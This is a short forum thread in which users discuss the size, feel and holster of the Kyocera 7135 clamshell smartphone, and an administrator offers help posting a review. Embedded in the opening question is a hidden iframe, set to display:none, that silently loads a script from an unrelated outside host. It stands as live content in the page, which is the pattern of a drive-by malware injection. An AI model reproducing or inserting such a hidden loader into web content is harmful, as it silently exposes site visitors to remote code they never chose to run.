+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

How is the size on this phone?

How is the size of this phone. How does it feel to use? Does it fit easily in your pocket?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

7135 size and form

Okay, I have been traveling the past 10 days and now I can start sharing my experience with the Kyocera 7135 smartphone. I will post a detailed review under its own heading this week, but to answer the question(s)...

The size of this phone is suprisingly small for a combo (phone/pda). Because of the clamshell design it is about 1/2 the size of the first generation Kyocera 6135. The feel of the phone is great in that is actually feels like a phone. It is not light, nor is it heavy. It fits into my pocket although I don't use it that way as a belt holster was included in the box. The holster is much better than any leather case or pouch that I have used before on other phones.

As I said above, I will be posting a detailed review of the phone later this week with photos included, so stay tuned...

Jon Clark

Editor and Site Administrator Convergent's Avatar

Great!

Great to hear you are liking the phone. While you are going through the review, check out the FAQ section that I started populating. Anything that is glaring at you that is missing, lets try to get it added. I can also help you get the review in ... ftp the files up to the server so they can be inline, and also separate it out to the review section. You should post it into the 7135 FAQ forum as a start, and then we can get it finalized.

See ya!
    Mike - Been Converged?